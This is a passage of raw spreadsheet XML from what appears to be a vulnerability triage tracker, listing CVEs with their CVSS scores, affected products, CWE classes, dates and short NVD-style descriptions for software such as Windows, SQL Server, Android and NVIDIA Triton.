t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-9040</t></is></c></row><row r="711"><c r="A711" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B711" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C711" s="5" t="inlineStr"><is><t>CVE-2026-77110</t></is></c><c r="D711" s="5" t="n"><v>7.6</v></c><c r="E711" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F711" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G711" s="5" t="inlineStr" /><c r="H711" s="5" t="n"><v>0.007</v></c><c r="I711" s="5" t="inlineStr" /><c r="J711" s="5" t="inlineStr" /><c r="K711" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L711" s="5" t="inlineStr" /><c r="M711" s="5" t="inlineStr" /><c r="N711" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O711" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P711" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q711" s="5" t="inlineStr" /><c r="R711" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S711" s="5" t="inlineStr"><is><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is></c><c r="T711" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77110</t></is></c></row><row r="712"><c r="A712" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B712" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C712" s="5" t="inlineStr"><is><t>CVE-2026-82053</t></is></c><c r="D712" s="5" t="n"><v>7.6</v></c><c r="E712" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F712" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G712" s="5" t="inlineStr" /><c r="H712" s="5" t="n"><v>0.002</v></c><c r="I712" s="5" t="inlineStr" /><c r="J712" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K712" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L712" s="5" t="inlineStr" /><c r="M712" s="5" t="inlineStr" /><c r="N712" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O712" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P712" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q712" s="5" t="inlineStr" /><c r="R712" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S712" s="5" t="inlineStr"><is><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is></c><c r="T712" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82053</t></is></c></row><row r="713"><c r="A713" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B713" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C713" s="5" t="inlineStr"><is><t>CVE-2026-86073</t></is></c><c r="D713" s="5" t="n"><v>7.6</v></c><c r="E713" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F713" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G713" s="5" t="inlineStr" /><c r="H713" s="5" t="n"><v>0.002</v></c><c r="I713" s="5" t="inlineStr" /><c r="J713" s="5" t="inlineStr" /><c r="K713" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L713" s="5" t="inlineStr" /><c r="M713" s="5" t="inlineStr" /><c r="N713" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O713" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P713" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q713" s="5" t="inlineStr" /><c r="R713" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S713" s="5" t="inlineStr"><is><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is></c><c r="T713" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86073</t></is></c></row><row r="714"><c r="A714" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B714" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C714" s="5" t="inlineStr"><is><t>CVE-2026-0860</t></is></c><c r="D714" s="5" t="n"><v>7.5</v></c><c r="E714" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F714" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G714" s="5" t="inlineStr" /><c r="H714" s="5" t="n"><v>0.002</v></c><c r="I714" s="5" t="inlineStr" /><c r="J714" s="5" t="inlineStr" /><c r="K714" s="5" t="inlineStr" /><c r="L714" s="5" t="inlineStr" /><c r="M714" s="5" t="inlineStr" /><c r="N714" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O714" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P714" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q714" s="5" t="inlineStr" /><c r="R714" s="5" t="inlineStr"><is><t>CWE-200</t></is></c><c r="S714" s="5" t="inlineStr"><is><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is></c><c r="T714" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-0860</t></is></c></row><row r="715"><c r="A715" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B715" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C715" s="5" t="inlineStr"><is><t>CVE-2026-16025</t></is></c><c r="D715" s="5" t="n"><v>7.5</v></c><c r="E715" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F715" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G715" s="5" t="inlineStr" /><c r="H715" s="5" t="n"><v>0.003</v></c><c r="I715" s="5" t="inlineStr" /><c r="J715" s="5" t="inlineStr" /><c r="K715" s="5" t="inlineStr" /><c r="L715" s="5" t="inlineStr" /><c r="M715" s="5" t="inlineStr" /><c r="N715" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O715" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P715" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q715" s="5" t="inlineStr" /><c r="R715" s="5" t="inlineStr"><is><t>CWE-1284</t></is></c><c r="S715" s="5" t="inlineStr"><is><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is></c><c r="T715" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16025</t></is></c></row><row r="716"><c r="A716" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B716" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C716" s="5" t="inlineStr"><is><t>CVE-2026-16037</t></is></c><c r="D716" s="5" t="n"><v>7.5</v></c><c r="E716" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F716" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G716" s="5" t="inlineStr" /><c r="H716" s="5" t="n"><v>0.003</v></c><c r="I716" s="5" t="inlineStr" /><c r="J716" s="5" t="inlineStr" /><c r="K716" s="5" t="inlineStr" /><c r="L716" s="5" t="inlineStr" /><c r="M716" s="5" t="inlineStr" /><c r="N716" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O716" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P716" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q716" s="5" t="inlineStr" /><c r="R716" s="5" t="inlineStr"><is><t>CWE-208</t></is></c><c r="S716" s="5" t="inlineStr"><is><t>Observable timing discrepancy vulnerability in PayTR Payment and Electronic Money Institution Inc. PayTR Virtual Pos iFrame API (v9x) WHMCS Module allows Black Box Reverse Engineering.

This issue affects PayTR Virtual Pos iFrame API (v9x) WHMCS Module: from v9.0.0 before v9.0.3.</t></is></c><c r="T716" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16037</t></is></c></row><row r="717"><c r="A717" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B717" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C717" s="5" t="inlineStr"><is><t>CVE-2026-16497</t></is></c><c r="D717" s="5" t="n"><v>7.5</v></c><c r="E717" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F717" s="5" t="inlineStr"><is><t>psirt@nvidia.com</t></is></c><c r="G717" s="5" t="inlineStr" /><c r="H717" s="5" t="n"><v>0.004</v></c><c r="I717" s="5" t="inlineStr" /><c r="J717" s="5" t="inlineStr" /><c r="K717" s="5" t="inlineStr" /><c r="L717" s="5" t="inlineStr" /><c r="M717" s="5" t="inlineStr" /><c r="N717" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O717" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P717" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q717" s="5" t="inlineStr" /><c r="R717" s="5" t="inlineStr"><is><t>CWE-834</t></is></c><c r="S717" s="5" t="inlineStr"><is><t>NVIDIA Triton Inference Server for Linux contains a vulnerability where an attacker could cause excessive iteration. A successful exploit of this vulnerability might lead to denial of service.</t></is></c><c r="T717" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16497</t></is></c></row><row r="718"><c r="A718" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B718" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C718" s="5" t="inlineStr"><is><t>CVE-2026-28604</t></is></c><c r="D718" s="5" t="n"><v>7.5</v></c><c r="E718" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F718" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G718" s="5" t="inlineStr" /><c r="H718" s="5" t="n"><v>0.002</v></c><c r="I718" s="5" t="inlineStr" /><c r="J718" s="5" t="inlineStr" /><c r="K718" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L718" s="5" t="inlineStr" /><c r="M718" s="5" t="inlineStr" /><c r="N718" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O718" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P718" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q718" s="5" t="inlineStr" /><c r="R718" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S718" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible use after free due to a race condition. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T718" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28604</t></is></c></row><row r="719"><c r="A719" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B719" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C719" s="5" t="inlineStr"><is><t>CVE-2026-3174</t></is></c><c r="D719" s="5" t="n"><v>7.5</v></c><c r="E719" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F719" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G719" s="5" t="inlineStr" /><c r="H719" s="5" t="n"><v>0.003</v></c><c r="I719" s="5" t="inlineStr" /><c r="J719" s="5" t="inlineStr" /><c r="K719" s="5" t="inlineStr" /><c r="L719" s="5" t="inlineStr" /><c r="M719" s="5" t="inlineStr" /><c r="N719" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O719" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P719" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q719" s="5" t="inlineStr" /><c r="R719" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S719" s="5" t="inlineStr"><is><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is></c><c r="T719" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-3174</t></is></c></row><row r="720"><c r="A720" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B720" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C720" s="5" t="inlineStr"><is><t>CVE-2026-47625</t></is></c><c r="D720" s="5" t="n"><v>7.5</v></c><c r="E720" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F720" s="5" t="inlineStr"><is><t>psirt@nvidia.com</t></is></c><c r="G720" s="5" t="inlineStr" /><c r="H720" s="5" t="n"><v>0.004</v></c><c r="I720" s="5" t="inlineStr" /><c r="J720" s="5" t="inlineStr" /><c r="K720" s="5" t="inlineStr" /><c r="L720" s="5" t="inlineStr" /><c r="M720" s="5" t="inlineStr" /><c r="N720" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O720" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P720" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q720" s="5" t="inlineStr" /><c r="R720" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S720" s="5" t="inlineStr"><is><t>NVIDIA Triton Inference Server for Linux contains a vulnerability where an attacker could abuse missing authorization. A successful exploit of this vulnerability might lead to information disclosure, data tampering, and denial of service.</t></is></c><c r="T720" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-47625</t></is></c></row><row r="721"><c r="A721" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B721" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C721" s="5" t="inlineStr"><is><t>CVE-2026-48888</t></is></c><c r="D721" s="5" t="n"><v>7.5</v></c><c r="E721" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F721" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G721" s="5" t="inlineStr" /><c r="H721" s="5" t="n"><v>0.003</v></c><c r="I721" s="5" t="inlineStr" /><c r="J721" s="5" t="inlineStr" /><c r="K721" s="5" t="inlineStr" /><c r="L721" s="5" t="inlineStr" /><c r="M721" s="5" t="inlineStr" /><c r="N721" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O721" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P721" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q721" s="5" t="inlineStr" /><c r="R721" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S721" s="5" t="inlineStr"><is><t>Allocation of Resources Without Limits or Throttling vulnerability in Automattic WooCommerce allows HTTP DoS.

This issue affects WooCommerce: from n/a before 11.1.0.</t></is></c><c r="T721" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-48888</t></is></c></row><row r="722"><c r="A722" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B722" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C722" s="5" t="inlineStr"><is><t>CVE-2026-57098</t></is></c><c r="D722" s="5" t="n"><v>7.5</v></c><c r="E722" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F722" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G722" s="5" t="inlineStr" /><c r="H722" s="5" t="n"><v>0.006</v></c><c r="I722" s="5" t="inlineStr" /><c r="J722" s="5" t="inlineStr" /><c r="K722" s="5" t="inlineStr"><is><t>microsoft:remote_desktop_client</t></is></c><c r="L722" s="5" t="inlineStr" /><c r="M722" s="5" t="inlineStr" /><c r="N722" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O722" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P722" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q722" s="5" t="inlineStr" /><c r="R722" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="S722" s="5" t="inlineStr"><is><t>Improper verification of cryptographic signature in Windows RDP Client allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T722" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-57098</t></is></c></row><row r="723"><c r="A723" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B723" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C723" s="5" t="inlineStr"><is><t>CVE-2026-57099</t></is></c><c r="D723" s="5" t="n"><v>7.5</v></c><c r="E723" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F723" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G723" s="5" t="inlineStr" /><c r="H723" s="5" t="n"><v>0.008</v></c><c r="I723" s="5" t="inlineStr" /><c r="J723" s="5" t="inlineStr" /><c r="K723" s="5" t="inlineStr" /><c r="L723" s="5" t="inlineStr" /><c r="M723" s="5" t="inlineStr" /><c r="N723" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O723" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P723" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q723" s="5" t="inlineStr" /><c r="R723" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S723" s="5" t="inlineStr"><is><t>Allocation of resources without limits or throttling in ASP.NET Core allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T723" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-57099</t></is></c></row><row r="724"><c r="A724" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B724" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C724" s="5" t="inlineStr"><is><t>CVE-2026-62759</t></is></c><c r="D724" s="5" t="n"><v>7.5</v></c><c r="E724" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F724" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G724" s="5" t="inlineStr" /><c r="H724" s="5" t="n"><v>0.003</v></c><c r="I724" s="5" t="inlineStr" /><c r="J724" s="5" t="inlineStr" /><c r="K724" s="5" t="inlineStr" /><c r="L724" s="5" t="inlineStr" /><c r="M724" s="5" t="inlineStr" /><c r="N724" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O724" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P724" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q724" s="5" t="inlineStr" /><c r="R724" s="5" t="inlineStr"><is><t>CWE-290</t></is></c><c r="S724" s="5" t="inlineStr"><is><t>Authentication bypass by spoofing in Windows Netlogon allows an unauthorized attacker to perform spoofing over an adjacent network.</t></is></c><c r="T724" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62759</t></is></c></row><row r="725"><c r="A725" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B725" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C725" s="5" t="inlineStr"><is><t>CVE-2026-62813</t></is></c><c r="D725" s="5" t="n"><v>7.5</v></c><c r="E725" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F725" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G725" s="5" t="inlineStr" /><c r="H725" s="5" t="n"><v>0.006</v></c><c r="I725" s="5" t="inlineStr" /><c r="J725" s="5" t="inlineStr" /><c r="K725" s="5" t="inlineStr" /><c r="L725" s="5" t="inlineStr" /><c r="M725" s="5" t="inlineStr" /><c r="N725" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O725" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P725" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q725" s="5" t="inlineStr" /><c r="R725" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S725" s="5" t="inlineStr"><is><t>Use after free in Active Directory Domain Services allows an authorized attacker to execute code over a network.</t></is></c><c r="T725" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62813</t></is></c></row><row r="726"><c r="A726" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B726" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C726" s="5" t="inlineStr"><is><t>CVE-2026-66304</t></is></c><c r="D726" s="5" t="n"><v>7.5</v></c><c r="E726" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F726" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G726" s="5" t="inlineStr" /><c r="H726" s="5" t="n"><v>0.007</v></c><c r="I726" s="5" t="inlineStr" /><c r="J726" s="5" t="inlineStr" /><c r="K726" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L726" s="5" t="inlineStr" /><c r="M726" s="5" t="inlineStr" /><c r="N726" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O726" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P726" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q726" s="5" t="inlineStr" /><c r="R726" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S726" s="5" t="inlineStr"><is><t>Server-side request forgery (ssrf) in Skype for Business allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T726" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66304</t></is></c></row><row r="727"><c r="A727" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B727" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C727" s="5" t="inlineStr"><is><t>CVE-2026-66307</t></is></c><c r="D727" s="5" t="n"><v>7.5</v></c><c r="E727" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F727" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G727" s="5" t="inlineStr" /><c r="H727" s="5" t="n"><v>0.006</v></c><c r="I727" s="5" t="inlineStr" /><c r="J727" s="5" t="inlineStr" /><c r="K727" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L727" s="5" t="inlineStr" /><c r="M727" s="5" t="inlineStr" /><c r="N727" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O727" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P727" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q727" s="5" t="inlineStr" /><c r="R727" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S727" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Skype for Business allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T727" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66307</t></is></c></row><row r="728"><c r="A728" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B728" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C728" s="5" t="inlineStr"><is><t>CVE-2026-67376</t></is></c><c r="D728" s="5" t="n"><v>7.5</v></c><c r="E728" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F728" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G728" s="5" t="inlineStr" /><c r="H728" s="5" t="n"><v>0.008</v></c><c r="I728" s="5" t="inlineStr" /><c r="J728" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K728" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L728" s="5" t="inlineStr" /><c r="M728" s="5" t="inlineStr" /><c r="N728" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O728" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P728" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q728" s="5" t="inlineStr" /><c r="R728" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S728" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in SQL Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T728" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67376</t></is></c></row><row r="729"><c r="A729" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B729" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C729" s="5" t="inlineStr"><is><t>CVE-2026-68887</t></is></c><c r="D729" s="5" t="n"><v>7.5</v></c><c r="E729" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F729" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G729" s="5" t="inlineStr" /><c r="H729" s="5" t="n"><v>0.008</v></c><c r="I729" s="5" t="inlineStr" /><c r="J729" s="5" t="inlineStr" /><c r="K729" s="5" t="inlineStr" /><c r="L729" s="5" t="inlineStr" /><c r="M729" s="5" t="inlineStr" /><c r="N729" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O729" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P729" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q729" s="5" t="inlineStr" /><c r="R729" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S729" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Message Queuing Queue Manager allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T729" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68887</t></is></c></row><row r="730"><c r="A730" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B730" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C730" s="5" t="inlineStr"><is><t>CVE-2026-69329</t></is></c><c r="D730" s="5" t="n"><v>7.5</v></c><c r="E730" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F730" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G730" s="5" t="inlineStr" /><c r="H730" s="5" t="n"><v>0.011</v></c><c r="I730" s="5" t="inlineStr" /><c r="J730" s="5" t="inlineStr" /><c r="K730" s="5" t="inlineStr" /><c r="L730" s="5" t="inlineStr" /><c r="M730" s="5" t="inlineStr" /><c r="N730" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O730" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P730" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q730" s="5" t="inlineStr" /><c r="R730" s="5" t="inlineStr"><is><t>CWE-125, CWE-190</t></is></c><c r="S730" s="5" t="inlineStr"><is><t>Out-of-bounds read in BranchCache allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T730" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69329</t></is></c></row><row r="731"><c r="A731" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B731" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C731" s="5" t="inlineStr"><is><t>CVE-2026-69342</t></is></c><c r="D731" s="5" t="n"><v>7.5</v></c><c r="E731" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F731" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G731" s="5" t="inlineStr" /><c r="H731" s="5" t="n"><v>0.011</v></c><c r="I731" s="5" t="inlineStr" /><c r="J731" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K731" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L731" s="5" t="inlineStr" /><c r="M731" s="5" t="inlineStr" /><c r="N731" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O731" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P731" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q731" s="5" t="inlineStr" /><c r="R731" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S731" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T731" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69342</t></is></c></row><row r="732"><c r="A732" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B732" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C732" s="5" t="inlineStr"><is><t>CVE-2026-69378</t></is></c><c r="D732" s="5" t="n"><v>7.5</v></c><c r="E732" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F732" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G732" s="5" t="inlineStr" /><c r="H732" s="5" t="n"><v>0.011</v></c><c r="I732" s="5" t="inlineStr" /><c r="J732" s="5" t="inlineStr" /><c r="K732" s="5" t="inlineStr" /><c r="L732" s="5" t="inlineStr" /><c r="M732" s="5" t="inlineStr" /><c r="N732" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O732" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P732" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q732" s="5" t="inlineStr" /><c r="R732" s="5" t="inlineStr"><is><t>CWE-674</t></is></c><c r="S732" s="5" t="inlineStr"><is><t>Uncontrolled recursion in Microsoft Exchange Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T732" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69378</t></is></c></row><row r="733"><c r="A733" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B733" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C733" s="5" t="inlineStr"><is><t>CVE-2026-69397</t></is></c><c r="D733" s="5" t="n"><v>7.5</v></c><c r="E733" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F733" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G733" s="5" t="inlineStr" /><c r="H733" s="5" t="n"><v>0.006</v></c><c r="I733" s="5" t="inlineStr" /><c r="J733" s="5" t="inlineStr"><is><t>openssh</t></is></c><c r="K733" s="5" t="inlineStr" /><c r="L733" s="5" t="inlineStr" /><c 